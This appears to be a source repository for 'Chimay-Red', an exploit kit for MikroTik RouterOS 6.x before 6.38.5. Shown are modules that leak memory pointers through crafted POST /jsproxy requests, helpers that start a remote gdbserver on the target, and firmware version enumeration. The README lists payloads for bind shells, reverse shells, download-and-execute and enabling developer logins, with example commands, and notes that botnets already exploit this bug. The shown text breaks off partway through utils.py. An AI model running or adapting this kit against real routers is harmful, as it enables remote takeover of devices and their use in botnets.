├── lib ├── thirdparty │ ├── __init__.py │ └── PySquashfsImage │ │ ├── __init__.py │ │ └── PySquashfsImage.py ├── __init__.py ├── defines.py ├── gdb_helper.py ├── leaker.py ├── versions.py ├── utils.py └── rop.py ├── mikro.db ├── requirements.txt ├── LICENSE ├── .gitignore ├── README.md ├── mikrodb.py └── chimay_red.py /lib/thirdparty/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ['PySquashfsImage'] -------------------------------------------------------------------------------- /mikro.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/seekintoo/Chimay-Red/HEAD/mikro.db -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | -e git+https://github.com/arthaud/python3-pwntools.git#egg=python3-pwntools 2 | -------------------------------------------------------------------------------- /lib/thirdparty/PySquashfsImage/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ('SquashFsImage', 'SquashedFile', 'SquashInode') 2 | 3 | from .PySquashfsImage import SquashFsImage 4 | from .PySquashfsImage import SquashedFile 5 | from .PySquashfsImage import SquashInode 6 | -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | """ Libraries and dependcies for mikrodb and chimay_red """ 3 | 4 | __all__ = ("defines", "gdb_helper", "leaker", "rop", "utils", "versions") 5 | 6 | from . import defines 7 | from . import gdb_helper 8 | from . import leaker 9 | from . import rop 10 | from . import utils 11 | from . import versions 12 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 @ Seekintoo Ltd. 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /lib/defines.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ Constant defines for chimay-red exploit and utilities """ 3 | 4 | import argparse 5 | import os 6 | 7 | # Switches 8 | DEBUG = False # Not used (currently) 9 | VERBOSE = False # Not used (currently) 10 | PROFILING = False 11 | 12 | # Architectures 13 | ARCHS = ("x86", "mipsbe", "smips", "mmips", "arm", "powerpc", "tile") 14 | SUPPORTED_ARCHS = (ARCHS[0], ARCHS[1]) 15 | 16 | # Filenames and filepaths 17 | CWD = os.getcwd() 18 | BASE_STORAGE_PATH = os.path.join(CWD, "storage") 19 | 20 | ROS_NPK_FMT = "routeros-{}-{}.npk" 21 | ROS_NPK_SHA256_FMT = ROS_NPK_FMT + ".sha256" 22 | 23 | WWW_BIN_FMT = "www-{}-{}.bin" 24 | WWW_BIN_SHA256_FMT = WWW_BIN_FMT + ".sha256" 25 | 26 | # cProfiles (files to trace) 27 | TRACEFILES = ( 28 | os.path.join(CWD, "mikrodb.py"), 29 | os.path.join(CWD, "lib", "utils.py"), 30 | os.path.join(CWD, "lib", "versions.py") 31 | ) 32 | 33 | # URLS 34 | MK_DOWNLOAD_PAGE = "https://mikrotik.com/download" 35 | MK_DOWNLOAD_CDN = "https://download2.mikrotik.com/routeros" 36 | 37 | # Offsets and Lenghts 38 | MAGIC_SIZE = 0x4 39 | SQUASHFS_OFFSET = 0x1000 40 | SQUASHFS_TILE_OFFSET = 0x10000 41 | 42 | SQUASHFS_MAGIC = b'hsqs' 43 | 44 | PTHREAD_STACK_SIZE = 0x20000 45 | PTHREAD_DEFAULT_STACK_SIZE = 0x800000 # http://man7.org/linux/man-pages/man3/pthread_create.3.html 46 | 47 | # Types 48 | NativeTextFactory = str 49 | 50 | # Namespaces 51 | TARGET = argparse.Namespace() 52 | 53 | # Ports 54 | PORTS = { 55 | "FTP_PORT": 21, 56 | "SSH_PORT": 22, 57 | "TELNET_PORT": 23, 58 | "HTTP_PORT": (80, 8080), 59 | "DEBUG_TELNET_PORT": 23000 60 | } 61 | 62 | # Vectors (techniques) 63 | VECTORS = ( 64 | "mikrodb", 65 | "build", 66 | "leak", 67 | "default" 68 | ) 69 | -------------------------------------------------------------------------------- /lib/gdb_helper.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | Pwntools GDB helper module for Chimay-Red 4 | """ 5 | import time 6 | 7 | from pwn import log, remote 8 | from pwnlib import gdb 9 | 10 | from lib.defines import PORTS 11 | 12 | 13 | def attach_gdb_server(host, port, binpath, breakpoints=None, prompt=True): 14 | gdb_cmds = list() 15 | if isinstance(port, str): 16 | if port.isdigit(): 17 | port = int(port) 18 | 19 | # GDB commands to exec on startup 20 | if breakpoints: 21 | for bp in breakpoints: 22 | if isinstance(bp, str): 23 | gdb_cmds.append("break *{0}".format(bp)) 24 | if isinstance(bp, int): 25 | gdb_cmds.append("break *{0}".format(hex(bp))) 26 | 27 | gdb_cmds.append("set disassembly-flavor intel") 28 | gdb_cmds.append("c") 29 | gdb_cmds = '\n'.join(gdb_cmds) 30 | gdb.attach((host, port), execute=gdb_cmds, exe=binpath) 31 | 32 | if prompt: 33 | input("[*] Press [Enter] to continue debugging: ") 34 | 35 | return True 36 | 37 | 38 | def run_new_remote_gdbserver(host, port): 39 | gdbserver_pid = None 40 | 41 | log.info("Attempting to connect to remote debugging gdbserver") 42 | try: 43 | remote_telnet = remote(host, PORTS["DEBUG_TELNET_PORT"]) 44 | except KeyboardInterrupt: 45 | raise SystemExit(log.warning("SIGINT received, exiting gracefully...")) 46 | else: 47 | remote_telnet.sendline("pidof gdbserver.i686"), time.sleep(1) # Have to sleep because of polling delay 48 | recv_data = remote_telnet.recv_raw(2048).decode('ascii', errors="ignore") 49 | 50 | for line in recv_data.split("\n"): 51 | newline = line.strip("\n") 52 | if newline.isdigit(): 53 | gdbserver_pid = newline 54 | break 55 | 56 | if gdbserver_pid: 57 | log.info("killing stale gdbserver...") 58 | remote_telnet.sendline("kill -9 {}".format(gdbserver_pid)), time.sleep(1) 59 | 60 | log.info("starting new remote gdbserver and attaching...") 61 | remote_telnet.sendline("/flash/bin/gdbserver.i686 {}:{} --attach $(pidof www) &".format(host, port)), time.sleep(1) 62 | 63 | return True 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by .ignore support plugin (hsz.mobi) 2 | 3 | ### JetBrains template 4 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm 5 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 6 | 7 | # User-specific stuff 8 | .idea/** 9 | 10 | # CMake 11 | cmake-build-debug/ 12 | cmake-build-release/ 13 | 14 | # Mongo Explorer plugin 15 | .idea/**/mongoSettings.xml 16 | 17 | # File-based project format 18 | *.iws 19 | 20 | # IntelliJ 21 | out/ 22 | 23 | # mpeltonen/sbt-idea plugin 24 | .idea_modules/ 25 | 26 | # JIRA plugin 27 | atlassian-ide-plugin.xml 28 | 29 | # Cursive Clojure plugin 30 | .idea/replstate.xml 31 | 32 | # Crashlytics plugin (for Android Studio and IntelliJ) 33 | com_crashlytics_export_strings.xml 34 | crashlytics.properties 35 | crashlytics-build.properties 36 | fabric.properties 37 | 38 | # Editor-based Rest Client 39 | .idea/httpRequests 40 | 41 | ### Python template 42 | # Byte-compiled / optimized / DLL files 43 | __pycache__/ 44 | *.py[cod] 45 | *$py.class 46 | 47 | # C extensions 48 | *.so 49 | 50 | # Distribution / packaging 51 | .Python 52 | build/ 53 | develop-eggs/ 54 | dist/ 55 | downloads/ 56 | eggs/ 57 | .eggs/ 58 | lib64/ 59 | parts/ 60 | sdist/ 61 | var/ 62 | wheels/ 63 | *.egg-info/ 64 | .installed.cfg 65 | *.egg 66 | MANIFEST 67 | 68 | # PyInstaller 69 | # Usually these files are written by a python script from a template 70 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 71 | *.manifest 72 | *.spec 73 | 74 | # Installer logs 75 | pip-log.txt 76 | pip-delete-this-directory.txt 77 | 78 | # Unit test / coverage reports 79 | htmlcov/ 80 | .tox/ 81 | .coverage 82 | .coverage.* 83 | .cache 84 | nosetests.xml 85 | coverage.xml 86 | *.cover 87 | .hypothesis/ 88 | .pytest_cache/ 89 | 90 | # Translations 91 | *.mo 92 | *.pot 93 | 94 | # Django stuff: 95 | *.log 96 | local_settings.py 97 | db.sqlite3 98 | 99 | # Flask stuff: 100 | instance/ 101 | .webassets-cache 102 | 103 | # Scrapy stuff: 104 | .scrapy 105 | 106 | # Sphinx documentation 107 | docs/_build/ 108 | 109 | # PyBuilder 110 | target/ 111 | 112 | # Jupyter Notebook 113 | .ipynb_checkpoints 114 | 115 | # pyenv 116 | .python-version 117 | 118 | # celery beat schedule file 119 | celerybeat-schedule 120 | 121 | # SageMath parsed files 122 | *.sage.py 123 | 124 | # Environments 125 | .env 126 | .venv 127 | env/ 128 | venv/ 129 | ENV/ 130 | env.bak/ 131 | venv.bak/ 132 | 133 | # Spyder project settings 134 | .spyderproject 135 | .spyproject 136 | 137 | # Rope project settings 138 | .ropeproject 139 | 140 | # mkdocs documentation 141 | /site 142 | 143 | # mypy 144 | .mypy_cache/ 145 | -------------------------------------------------------------------------------- /lib/leaker.py: -------------------------------------------------------------------------------- 1 | import re 2 | import time 3 | from binascii import hexlify 4 | from collections import Counter 5 | 6 | from pwn import log 7 | 8 | from lib.defines import PORTS, TARGET 9 | from lib.utils import craft_post_header, create_socket 10 | 11 | 12 | class MikroLeaker(object): 13 | """ 14 | Class for storing functions to leak pointers remotely 15 | from given MikroTik(TM) webserver (www) 16 | 17 | Keyword Arguments: 18 | 19 | - leak_rounds (int): amount of times (rounds) to leak 20 | 21 | - leak_attempts (int): amount of attempts per round to leak information 22 | 23 | - leak_wait_time (int): amount of time to wait between rounds 24 | if no (valid) pointers found 25 | 26 | Example Usage: 27 | 28 | >>> leaker = MikroLeaker(leak_attempts=70, leak_rounds=30, leak_wait_time=10) 29 | >>> leaker.leak() 30 | >>> leaker.analyze_leaks() 31 | """ 32 | 33 | def __init__(self, context, **kwargs): 34 | self.leakedlist = list() 35 | self.leak_rounds = 30 36 | self.leak_attempts = 70 37 | self.leak_wait_time = 10 38 | 39 | self.context = context 40 | 41 | for kwarg in ("leak_attempts", "leak_rounds", "leak_wait_time"): 42 | if kwargs.get(kwarg) and isinstance(kwargs.get(kwarg), int): 43 | setattr(self, kwarg, kwargs[kwarg]) 44 | 45 | def leak(self, close=True, trim=True): 46 | """ 47 | 48 | :param close: 49 | :param trim: 50 | :return: 51 | """ 52 | current_round = 0 53 | total_leak_counter = 0 54 | leak_adjust_switch = False 55 | 56 | while True: 57 | log.info("Round: {}".format(current_round)) 58 | round_hits = 0 59 | for _ in range(self.leak_attempts): 60 | leaked = self.leak_pointer(close=close, trim=trim) 61 | if leaked is not None: 62 | for pointer in leaked: 63 | log.info("-> 0x{}".format(pointer)) 64 | self.leakedlist.append(pointer) 65 | round_hits += 1 66 | 67 | if round_hits == 0: 68 | log.warning("unable to leak valid pointers during round, " 69 | "trying again after {} seconds".format(self.leak_wait_time)) 70 | time.sleep(self.leak_wait_time) 71 | if leak_adjust_switch: 72 | leak_adjust_switch = False 73 | self.leak_attempts -= 10 74 | else: 75 | leak_adjust_switch = True 76 | self.leak_attempts += 10 77 | else: 78 | total_leak_counter += round_hits 79 | if current_round != self.leak_rounds: 80 | current_round += 1 81 | else: 82 | break 83 | 84 | log.success("leaked {} possible pointers!".format(total_leak_counter)) 85 | 86 | return self.leakedlist 87 | 88 | def analyze_leaks(self, leakedlist=None): 89 | """ 90 | 91 | :param leakedlist: 92 | :return: 93 | """ 94 | 95 | sortedlist = list() 96 | 97 | if isinstance(leakedlist, list): 98 | if len(leakedlist) > 1: 99 | self.leakedlist = leakedlist 100 | elif len(self.leakedlist) < 2: 101 | log.warning("not enough pointers to analyse from leaked list") 102 | return False 103 | 104 | log.info("analyzing pointers from leaked list...") 105 | 106 | for pointer in self.leakedlist: 107 | sortedlist.append(int("0x{}".format(pointer), 16)) 108 | 109 | log.info("sorting pointers: ") 110 | sortedlist = sorted(sortedlist) 111 | 112 | for pointer in sortedlist: 113 | log.info("-> {}".format(hex(pointer))) 114 | 115 | duplicates = Counter(sortedlist) 116 | 117 | log.info("attempting to locate duplicates...") 118 | 119 | counter = 0 120 | for key, value in duplicates.items(): 121 | if value > 1: 122 | log.info("found duplicate pointer: {}".format(hex(key))) 123 | counter += 1 124 | 125 | if counter == 0: 126 | log.warning("could not locate any duplicates") 127 | 128 | return True 129 | 130 | def leak_pointer(self, close=False, trim=False): 131 | """ 132 | 133 | :param close: 134 | :param trim: 135 | :return: 136 | """ 137 | 138 | if not hasattr(TARGET, "host"): 139 | raise RuntimeError("No host specified in TARGET namespace") 140 | 141 | valid_pointers = list() 142 | address_size = self.context.bits >> 2 143 | 144 | pointer_expressions = ( 145 | re.compile(r"0805\w{0,4}"), 146 | re.compile(r"774\w{0,5}"), 147 | re.compile(r"775\w{0,5}"), 148 | re.compile(r"776\w{0,5}"), 149 | re.compile(r"777\w{0,5}"), 150 | re.compile(r"778\w{0,5}"), 151 | re.compile(r"779\w{0,5}"), 152 | # re.compile(r"7f0\w{0,5}"), 153 | # re.compile(r"7f1\w{0,5}"), 154 | # re.compile(r"7f2\w{0,5}"), 155 | # re.compile(r"7f3\w{0,5}"), 156 | # re.compile(r"7f4\w{0,5}"), 157 | # re.compile(r"7f5\w{0,5}"), 158 | # re.compile(r"7f6\w{0,5}"), 159 | # re.compile(r"7f7\w{0,5}"), 160 | # re.compile(r"7f8\w{0,5}"), 161 | # re.compile(r"7f9\w{0,5}"), 162 | ) 163 | 164 | # disable pwntools sock create and send messages 165 | with self.context.local(): 166 | self.context.log_level = "WARNING" 167 | sock = create_socket(TARGET.host, PORTS["HTTP_PORT"][0]) 168 | sock.send(craft_post_header()) 169 | data = sock.recv(4096).decode().split("\n") 170 | 171 | if close: 172 | sock.close() 173 | 174 | if len(data) == 9: 175 | data = hexlify((data[7] + data[8]).encode()) 176 | else: 177 | data = hexlify((data[-1]).encode()) 178 | if trim: 179 | data = data[26:] 180 | 181 | data = data.decode() 182 | 183 | for pointer_exp in pointer_expressions: 184 | match = pointer_exp.search(data) 185 | if match: 186 | left, right = match.span() 187 | if -(left - right) == address_size: 188 | valid_pointers.append(data[left:right]) 189 | 190 | if valid_pointers: 191 | return valid_pointers 192 | 193 | return None 194 | -------------------------------------------------------------------------------- /lib/versions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import re 5 | import urllib.request as urllib 6 | from collections import namedtuple 7 | 8 | from lib.defines import MK_DOWNLOAD_CDN, MK_DOWNLOAD_PAGE 9 | from lib.utils import print_info, print_progress 10 | 11 | 12 | def check_ros_version(architecture: str, version: str) -> bool: 13 | """ 14 | 15 | :param architecture: 16 | :param version: 17 | :return: 18 | """ 19 | 20 | if not all(isinstance(var, str) for var in (architecture, version)): 21 | raise TypeError("Expected str type for architecture and version, got {0} and {1}".format( 22 | type(architecture), type(version))) 23 | 24 | url = "{}/{}/routeros-{}-{}.npk".format(MK_DOWNLOAD_CDN, version, architecture, version) 25 | 26 | request = urllib.Request(url) 27 | request.get_method = lambda: "HEAD" 28 | 29 | try: 30 | urllib.urlopen(request) 31 | except IOError: 32 | return False 33 | 34 | return True 35 | 36 | 37 | def download_ros_version(architecture: str, version: str): 38 | """ 39 | 40 | :param architecture: 41 | :param version: 42 | :return: 43 | """ 44 | 45 | if not all(isinstance(var, str) for var in (architecture, version)): 46 | raise TypeError("Expected str type for architecture and version, got {0} and {1}".format( 47 | type(architecture), type(version))) 48 | 49 | url = "{}/{}/routeros-{}-{}.npk".format(MK_DOWNLOAD_CDN, version, architecture, version) 50 | 51 | try: 52 | response = urllib.urlopen(url) 53 | setattr(response, "content", response.read()) 54 | except IOError: 55 | return False 56 | 57 | return response 58 | 59 | 60 | def yield_ros_images(architecture: str, versions: (tuple, list), verbose=False) -> iter: 61 | """ yields response object from `download_ros_version()` """ 62 | 63 | if not isinstance(architecture, str): 64 | raise TypeError("expecting str type for architecture, got {0}".format(type(architecture))) 65 | if not isinstance(versions, (tuple, list)): 66 | raise TypeError("expecting list type for versions, got {0}".format(type(versions))) 67 | 68 | with print_progress("Downloading NPK {} image version".format(architecture)) as progress: 69 | for version in versions: 70 | if verbose: 71 | progress.status(version) 72 | yield download_ros_version(architecture, version) 73 | 74 | 75 | def latest_ros_version() -> list: 76 | """ 77 | 78 | :return: 79 | """ 80 | 81 | latest_version = None 82 | version_regex = re.compile(r"(\d+\.\d+|\d+\.\d+\.\d+) \(Current\)") 83 | 84 | response = urllib.urlopen(MK_DOWNLOAD_PAGE).read().decode() 85 | for line in response.split("\n"): 86 | match = version_regex.search(line) 87 | if match: 88 | latest_version = list(match.groups()[0].split(".")) 89 | break 90 | 91 | if not latest_version: 92 | raise RuntimeWarning() 93 | 94 | return latest_version 95 | 96 | 97 | def ros_version_ranges(latest_version: (tuple, list)) -> namedtuple: 98 | versions = namedtuple( 99 | "versions", 100 | [ 101 | "current_version", 102 | "minimum_major", 103 | "maximum_major", 104 | "minimum_minor", 105 | "maximum_minor", 106 | "minimum_build", 107 | "maximum_build" 108 | ] 109 | ) 110 | 111 | if not latest_version: 112 | versions.minimum_major = 6 113 | versions.maximum_major = 6 114 | 115 | versions.minimum_minor = 0 116 | versions.maximum_minor = 38 117 | 118 | versions.minimum_build = 0 119 | versions.maximum_build = 5 120 | else: 121 | major, minor = versions.current_version = latest_version[0:2] 122 | 123 | versions.minimum_major = int(major) 124 | versions.maximum_major = int(major) 125 | 126 | versions.minimum_minor = 30 127 | versions.maximum_minor = int(minor) 128 | 129 | versions.minimum_build = 1 130 | versions.maximum_build = 10 131 | 132 | return versions 133 | 134 | 135 | def yield_ros_availability(architecture: str) -> iter: 136 | """ 137 | 138 | :param architecture: 139 | :return: 140 | """ 141 | 142 | versions = ros_version_ranges(latest_ros_version()) 143 | 144 | for major in [versions.minimum_major]: 145 | for minor in range(versions.minimum_minor, versions.maximum_minor): 146 | if check_ros_version(architecture, "{}.{}".format(major, minor)): 147 | yield "{}.{}".format(major, minor) 148 | for build in range(versions.minimum_build, versions.maximum_build): 149 | if check_ros_version(architecture, "{}.{}.{}".format(major, minor, build)): 150 | yield "{}.{}.{}".format(major, minor, build) 151 | 152 | 153 | def dump_available_versions(architectures: (tuple, list), verbose=True) -> dict: 154 | if not isinstance(architectures, (tuple, list)): 155 | raise TypeError("architectures requires tuple/list, got {0}".format(type(architectures))) 156 | 157 | available_versions = dict() 158 | available_versions_counter = int() 159 | 160 | if verbose: 161 | print_info("Testing versions for architectures: {}".format(architectures)) 162 | 163 | for architecture in architectures: 164 | if verbose: 165 | progress = (print_progress("Testing versions for {}".format(architecture))) 166 | 167 | available_versions[architecture] = list() 168 | for version in yield_ros_availability(architecture): 169 | available_versions[architecture].append(version) 170 | if verbose: 171 | progress.status(version) 172 | 173 | architecture_versions = len(available_versions[architecture]) 174 | available_versions_counter += architecture_versions 175 | if verbose: 176 | progress.success("\033[92m[DONE] [{}]\x1b[0m\n".format(architecture_versions)) 177 | 178 | if verbose: 179 | print() 180 | print_info("VERSION ENUM RESULTS:") 181 | print() 182 | for architecture, versions in available_versions.items(): 183 | print_info("Architecture [{}] results:".format(architecture)) 184 | for version1, version2, version3 in zip(versions[::3], versions[1::3], versions[2::3]): 185 | print_info('{0:<10}{1:<10}{2:<}'.format(version1, version2, version3)) 186 | print() 187 | print_info("Total versions found accross tested architectures: [{}]".format(available_versions_counter)) 188 | 189 | return available_versions 190 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Chimay-Red 2 | Mikrotik RouterOS (6.x < 6.38.5) exploit kit. Reverse engineered from the "Vault 7" WikiLeaks publication. 3 | 4 | To learn more about the creation and purpose of this software, please visit: [http://blog.seekintoo.com/chimay-red.html](http://blog.seekintoo.com/chimay-red.html) 5 | 6 | ## Important Note: 7 | 8 | After further consideration by the **Seekintoo** team, it has been decided that additional architecture support will NOT be released exploiting any `RouterOS` supporting architecture either than `x86` and `mips`*. 9 | 10 | The reasoning for this, after further research, is that there are currently botnet(s) operating on the internet taking advantage of this exact exploit attacking both x86 and mips* systems, both of which public exploits have been released for. The name of one of these botnets is "hajime". hajime's inception was long ago, but as of late it has been noticed to abuse the chimay-red exploit on `RouterOS 6.x` devices as covered and analyzed extensively (to name a few): 11 | 12 | - [https://avlab.pl/en/exploit-chimay-red-vulnerable-device-mikrotik-and-ubiquiti-form-giant-botnet](https://avlab.pl/en/exploit-chimay-red-vulnerable-device-mikrotik-and-ubiquiti-form-giant-botnet) 13 | 14 | - [https://www.bleepingcomputer.com/news/security/hajime-botnet-makes-a-comeback-with-massive-scan-for-mikrotik-routers/](https://www.bleepingcomputer.com/news/security/hajime-botnet-makes-a-comeback-with-massive-scan-for-mikrotik-routers/) 15 | 16 | - [https://www.corero.com/blog/882-hajime-botnet-scanning-for-vulnerable-mikrotik-routers.html](https://www.corero.com/blog/882-hajime-botnet-scanning-for-vulnerable-mikrotik-routers.html) 17 | 18 | - [https://forum.mikrotik.com/viewtopic.php?t=132490](https://forum.mikrotik.com/viewtopic.php?t=132490) 19 | 20 | In-addition to the timing of the release of the first (known) public PoC for Chimay-Red by [BigNerd](https://github.com/BigNerd95/Chimay-Red) in contrast to the current state of rampant `RouterOS` harvesting botnets is currently too much to ignore. Therefore **Seekintoo** will **NOT** be responsible for contributing to these criminal enterprises. 21 | 22 | Although if public exploits for additional architectures are found posted on source code hosting facilities, if robust enough, they WILL be re-supported here. 23 | 24 | Feel free to contact me at: dpidhirney@seekintoo dot com 25 | 26 | ## Chimay-Red Usage: 27 | 28 | ```text 29 | usage: chimay_red.py [-h] -t TARGET [-l LHOST] [--shellcommand SHELLCOMMAND] 30 | [-d] [--breakpoints BREAKPOINTS] [-a ARCHITECTURE] 31 | [--gdbport GDBPORT] [--binary BINARY] 32 | [--shellcode SHELLCODE] [--vector VECTOR] 33 | [--leakrounds LEAKROUNDS] [-v] [--version] 34 | command 35 | 36 | positional arguments: 37 | command command function to run on target, see below for 38 | options 39 | 40 | optional arguments: 41 | -h, --help show this help message and exit 42 | -t TARGET, --target TARGET 43 | target address:port 44 | -l LHOST, --lhost LHOST 45 | specify the connectback* address 46 | --shellcommand SHELLCOMMAND 47 | return interactive shell as main payload (default) 48 | -d, --debug enable debugging mode 49 | --breakpoints BREAKPOINTS 50 | list of comma delimited breakpoint addresses. Eg. 51 | 0x800400,0x800404 52 | -a ARCHITECTURE, --architecture ARCHITECTURE 53 | target architecture (will detect automatically if 54 | target in route table range) 55 | --gdbport GDBPORT port to use when connecting to remote gdbserver 56 | --binary BINARY target binary (www) 57 | --shellcode SHELLCODE 58 | custom (optional) shellcode payload binary filepath 59 | --vector VECTOR optional vector type, see below for options 60 | --leakrounds LEAKROUNDS 61 | amount of rounds to leak pointers, higher is better, 62 | but takes more time 63 | -v, --verbose Verbosity mode 64 | --version show program's version number and exit 65 | 66 | Commands: 67 | COMMAND FUNCTION 68 | 69 | bindshell create a bindshell 70 | connectback create a reverse shell 71 | download_and_exe connect back and download a file to then execute 72 | ssl_download_and_exe connect back and download a file via SSL to then execute 73 | write_devel write "devel-login" file to allow developer account login 74 | write_devel_read_userfile in addition to enabling developer logins, read back the users file 75 | 76 | custom_shellcode run arbitrary shellcode from `--shellcode` binfile 77 | custom_shell_command run a arbitrary $sh one liner on the target 78 | 79 | Vectors: 80 | default: (mikrodb) 81 | 82 | [Generic] 83 | mikrodb: 84 | use the accompanying mikrodb database to load offsets 85 | based off of detected remote version to build a ROP chain. 86 | 87 | build: 88 | build a ROP chain from scratch given the www binary matching 89 | the remote version running. 90 | 91 | [Experimental] 92 | leak: 93 | leak pointers from shared libraries to give better odds of 94 | finding base offset of uclibc. 95 | 96 | Examples: 97 | 98 | Running simple shell command: 99 | ./chimay_red.py -v -t 192.168.56.124:80 \ 100 | --vector=mikrodb \ 101 | --lhost=192.168.56.1 \ 102 | --shellcommand="ls -la" custom_shell_command 103 | 104 | Getting a reverse shell: 105 | ./chimay_red.py -v -t 192.168.56.124:80 \ 106 | --vector=mikrodb \ 107 | --lhost=192.168.56.1 connectback 108 | 109 | Debugging the target: 110 | ./chimay_red.py -v -t 192.168.56.124:80 \ 111 | --vector=build \ 112 | --architecture="x86" \ 113 | --binary=$PWD/storage/www/www-x86-6.38.4.bin \ 114 | --debug \ 115 | --gdbport=4444 \ 116 | --lhost=192.168.56.1 connectback 117 | 118 | 119 | ================================================== 120 | | _______ _ ___ __| 121 | | / ___/ / (_)_ _ ___ ___ ______/ _ \___ ___/ /| 122 | |/ /__/ _ \/ / ' \/ _ `/ // /___/ , _/ -_) _ / | 123 | |\___/_//_/_/_/_/_/\_,_/\_, / /_/|_|\__/\_,_/ | 124 | | /___/ | 125 | ================================================== 126 | ``` 127 | 128 | ## mikrodb Usage: 129 | 130 | ```text 131 | usage: mikrodb.py [-h] [-v] [--architectures ARCHITECTURES] 132 | [--versions VERSIONS] 133 | 134 | optional arguments: 135 | -h, --help show this help message and exit 136 | -v, --verbose Verbosity mode 137 | --architectures ARCHITECTURES 138 | architectures to build for. Eg. --architectures="x86" 139 | or "x86,mmips" 140 | --versions VERSIONS versions to build for. Eg. --versions="6.38.4" or 141 | "6.36.4,6.38.4" 142 | 143 | Example: 144 | ./mikrodb.py --architectures="x86" --versions="6.36.4,6.38.4" 145 | 146 | ``` 147 | -------------------------------------------------------------------------------- /lib/utils.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ General utilities file for exploits and mikrodb """ 3 | import fnmatch 4 | import ipaddress 5 | import linecache 6 | import os 7 | import socket 8 | import struct 9 | import tracemalloc 10 | from binascii import hexlify 11 | 12 | from pwn import remote, log 13 | 14 | from lib.defines import MAGIC_SIZE, SQUASHFS_MAGIC, SQUASHFS_OFFSET 15 | 16 | print_info = log.info 17 | print_progress = log.progress 18 | 19 | 20 | def craft_post_header(length=0, content_length=True): 21 | """ returns header with 'content-length' set to 'num' """ 22 | 23 | if content_length: 24 | header = b"POST /jsproxy HTTP/1.1\r\nContent-Length: " 25 | header += "{}\r\n\r\n".format(str(length)).encode() 26 | else: 27 | header = b"POST /jsproxy HTTP/1.1\r\n\r\n" 28 | 29 | return header 30 | 31 | 32 | def create_socket(host: str, port: int): 33 | """ 34 | returns pwn.remote socket connection given: 35 | hostname and port number 36 | """ 37 | if isinstance(port, str): 38 | if port.isdigit(): 39 | port = int(port) 40 | 41 | try: 42 | s = socket.socket() 43 | s.connect((host, port)) 44 | s = remote.fromsocket(s) 45 | except Exception: 46 | raise ConnectionAbortedError 47 | 48 | return s 49 | 50 | 51 | def get_system_routes() -> iter: 52 | """Read the default gateway directly from /proc.""" 53 | with open("/proc/net/route") as fh: 54 | for line in fh: 55 | fields = line.strip().split() 56 | if fields[1] == "00000000" or fields[1][0].isupper(): 57 | continue 58 | yield socket.inet_ntoa(struct.pack("=L", int(fields[1], 16))) 59 | 60 | 61 | def check_cidr_overlap(address1: str, address2: str) -> bool: 62 | """ 63 | 64 | :param address1: 65 | :param address2: 66 | :return: 67 | """ 68 | 69 | return ipaddress.ip_address(address1) in ipaddress.ip_network(address2) 70 | 71 | 72 | def read_bin_file(filename: str): 73 | """ reads binary data from `filename`""" 74 | if not os.path.isfile(filename): 75 | raise FileNotFoundError() 76 | 77 | with open(filename, "rb") as fd: 78 | return fd.read() 79 | 80 | 81 | def find_files(directory: str, pattern: str): 82 | """ 83 | 84 | :param directory: 85 | :param pattern: 86 | :return: 87 | """ 88 | for root, _, files in os.walk(directory): 89 | for basename in files: 90 | if fnmatch.fnmatch(basename, pattern): 91 | filename = os.path.join(root, basename) 92 | yield filename 93 | 94 | 95 | def write_to_file(data: bytes, filepath: str) -> int: 96 | """ Writes arbitrary bytes to a file given `data` and `filepath` 97 | 98 | Returns number of `bytes` written 99 | """ 100 | 101 | if not isinstance(data, bytes): 102 | raise TypeError("data expecting type bytes, got {0}".format(type(data))) 103 | if not isinstance(filepath, str): 104 | raise TypeError("data expecting type bytes, got {0}".format(type(data))) 105 | 106 | with open(filepath, "wb") as fd: 107 | return fd.write(data) 108 | 109 | 110 | def check_squashfs_offset(filepath: str, offset=SQUASHFS_OFFSET) -> bool: 111 | """ 112 | 113 | :param filepath: 114 | :param offset: 115 | :return: 116 | """ 117 | if not os.path.isfile(filepath): 118 | raise FileNotFoundError() 119 | 120 | with open(filepath, "rb") as fd: 121 | fd.seek(offset) 122 | magic_header = fd.read(MAGIC_SIZE) 123 | 124 | if magic_header != SQUASHFS_MAGIC: 125 | return False 126 | 127 | return True 128 | 129 | 130 | def display_top(snapshot, key_type='lineno', limit=10, modpaths=None): 131 | """ 132 | 133 | :param snapshot: 134 | :param key_type: 135 | :param limit: 136 | :param modpaths: 137 